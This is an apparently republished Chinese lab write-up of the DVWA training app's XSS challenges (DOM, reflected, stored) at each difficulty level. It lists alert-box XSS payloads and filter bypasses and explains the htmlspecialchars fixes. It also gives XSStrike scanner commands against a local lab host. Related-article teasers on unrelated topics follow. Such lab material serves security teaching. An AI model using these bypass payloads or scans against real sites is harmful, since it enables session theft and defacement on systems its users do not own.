dvwa:xss全系列全难度解析

devtools/2024/10/19 11:42:17/
引号内注入:
<select name="default"><option value="English">English</option>^^^^^^^<option value="" disabled="disabled">----</option><option value='English'>English</option><option value='French'>French</option>...
</select>
​
引号外注入:
<select name="default"><option value="English">English</option>^^^^^^^<option value="" disabled="disabled">----</option><option value='English'>English</option><option value='French'>French</option>...
</select>

xss-dom

low
引号内注入:"> <script>alert(1)</script>
引号外注入:<script>alert(1)</script>
medium
过滤了$_GET['default']过滤了<script
引号内注入:
#"> <script>alert(1)</script>
​
此时的url为:/dvwa/vulnerabilities/xss_d/?default=#">%20<script>alert(1)</script>
后端$_GET['default']获取的值为空,而前端获取的default参数为#">%20<script>alert(1)</script>
这是因为$_GET['default']会自动选择#前的内容,而前端是通过js代码经过url字符截断获取的参数
​
引号外注入:
</select><img src = 1 onerror = alert(1)>   // 注:img标签必须出现在select标签之外
​
tips:
1.<select></select>标签内部出现img图片标签将不做任何解析,也就是说<img src = 1 onerror = alert(1)>不能出现在<select>内部,否则浏览器直接忽略<select>内的img标签
2.<option>标签不会对onmousemove或onclick等函数进行解析,所以此情况下引号内注入οnmοusemοve='alert(1)'将没有任何用处,如:
<option value="" οnclick='alert(1)'>此情况onclick无论如何都触发不了,可能option标签天生就不支持这样的功能,而select
<select value="" οnclick='alert(1)'>此情况可以触发onclick,所以select支持这种功能
high
对$_GET['default']进行限制,其只能是"French"、"English"、"German"、"Spanish"这几个字符
​
还是之前说的前端输出的数据,跟后端判断的数据不统一,例如输入default=French#blablabla
后端获取为:French
前端输出为:French#blablabla
​
引号内注入:
French#"> <script>alert(1)</script>
引号外注入:
English#</select><img src = 1 onerror = alert(1)>

impossible

前端没有调用decodeURL函数导致输出的内容是url编码的字符串
源码功能解析
用户发送get请求:http://www.oswe.com/dvwa/vulnerabilities/xss_d/?default=English
​
后端通过$_GET['default']获取get请求值
而前端通过js代码字符串截断url获取get请求值
也就是说前后端获取的get请求值不是同一个来源,不是同一个变量,是不统一的,
​
当default=English#blablabla 时
后端获取的值:English#
前端获取的值:English#blablabla
也就是说后端判断的值没有携带#后面内容,这是$_GET['']变量的特性
而前端是通过url字符串截断获取的English#blablabla

xss-reflected

  • 只有引号外闭合

low
<script>alert(1)</script>
medium
替换'<script>'为空
​
<ScRipt>alert(1)</script>
<img src=1 οnerrοr='alert(1)'>
high
script被过滤
​
<img src=1 οnerrοr='alert(1)'>
impossible
$name = htmlspecialchars( $_GET[ 'name' ] ); 
实体化输出

xss-stored

low
Message:
<script>alert(1)</script>
medium
message前端内容被实体化
name替换'<script>'为空
​
html修改一下name的input容量
name:
<sCRiPt>alert(1)</script>
high
message前端内容被实体化
name下script被过滤
​
html修改一下name的input容量
name:
<img src=1 οnerrοr='alert(1)'>
impossible
$message = htmlspecialchars( $message ); 
$name = htmlspecialchars( $name ); 
前端内容实体化,不被浏览器解析

xss工具:xsstrike

能扫xss-reflected的low、medium、high难度
其他系列都扫不出来
​
python xsstrike.py -u "http://www.oswe.com/dvwa/vulnerabilities/xss_r/?name=1#" --headers "Cookie: PHPSESSID=fvka8d269vd8t386ir30utsorl; security=low" --proxy
​
python xsstrike.py -u "http://www.oswe.com/dvwa/vulnerabilities/xss_r/?name=1#" --headers "Cookie: PHPSESSID=fvka8d269vd8t386ir30utsorl; security=medium" --proxy
​
python xsstrike.py -u "http://www.oswe.com/dvwa/vulnerabilities/xss_r/?name=1#" --headers "Cookie: PHPSESSID=fvka8d269vd8t386ir30utsorl; security=high" --proxy
​
此工具如果想要使用代理,执行以下操作:
1.export HTTP_PROXY=http:127.0.0.1:8080/                    # 指定代理地址
2.--proxy参数开启代理

http://www.ppmy.cn/devtools/125084.html

相关文章

使用verilog设计实现简单神经网络加速器及其仿真

以下是使用FPGA实现简单神经网络加速器的基本步骤: **一、神经网络模型选择与简化** 1. **选择合适的神经网络模型** - 对于简单的神经网络加速器,可以选择多层感知机(MLP)作为基础模型。MLP由输入层、隐藏层和输出层组成,各层之间通过全连接方式连接。 - 例如,构…

Web3与人工智能的交叉应用探索

随着数字技术的发展&#xff0c;Web3与人工智能&#xff08;AI&#xff09;之间的结合正逐渐成为一个重要的研究领域。Web3技术旨在实现更加去中心化和透明的互联网&#xff0c;而人工智能则在数据分析、自动化决策和增强人类能力方面展示了巨大的潜力。 1. 去中心化数据管理与…

transformer模型代码及应用

原论文&#xff1a;Attention Is All You Need 在这篇博客中&#xff0c;transformer模型主要用于翻译&#xff0c;中译英&#xff0c;但是这里主要注重的是模型的代码。 具体应用的例子放在最后&#xff0c;大家有兴趣的可以看看。 首先&#xff0c;让我们来了解一下transf…

基于Python Django的在线考试管理系统

&#x1f34a;作者&#xff1a;计算机毕设匠心工作室 &#x1f34a;简介&#xff1a;毕业后就一直专业从事计算机软件程序开发&#xff0c;至今也有8年工作经验。擅长Java、Python、微信小程序、安卓、大数据、PHP、.NET|C#、Golang等。 擅长&#xff1a;按照需求定制化开发项目…

PPT分享:埃森哲-业务流程BPM能力框架体系

PPT下载链接见文末~ 业务流程管理&#xff08;BPM, Business Process Management&#xff09;的能力框架体系是一个全面、系统的流程管理方法论和工具集&#xff0c;旨在帮助企业优化和持续改进其业务流程&#xff0c;从而提升运营效率和市场竞争力。 一、BPM能力框架体系概述…

第十五章 RabbitMQ延迟消息之延迟插件

目录 一、引言 二、延迟插件安装 2.1. 下载插件 2.2. 安装插件 2.3. 确认插件是否生效 三、核心代码 四、运行效果 五、总结 一、引言 上一章我们讲到通过死信队列组合消息过期时间来实现延迟消息&#xff0c;但相对而言这并不是比较好的方式。它的代码实现相对来说比…

rpc中常用的数据格式:Protobuf 图文详解

概述 protobuf也叫protocol buffer&#xff0c;是google 的一种数据交换的格式&#xff0c;它跨语言、跨平台。可以实现多种语言文件的数据传输实现&#xff08;java、c#、c、go 和 python 等&#xff09;&#xff0c;如一个cpp程序和一个python程序的数据传输。 由于它是一种…

idea - properties文件unicode中文显示

&#x1f496;简介 idea中properties文件中文默认展示为unicode码 unicode 中文展示为 \u开头的ASCII &#x1f31f;调整中文显示 idea -> settings -> Editor -> File Encodings Global Encoding 选择 UTF-8 Project Encoding 选择 UTF-8 Default encoding for pro…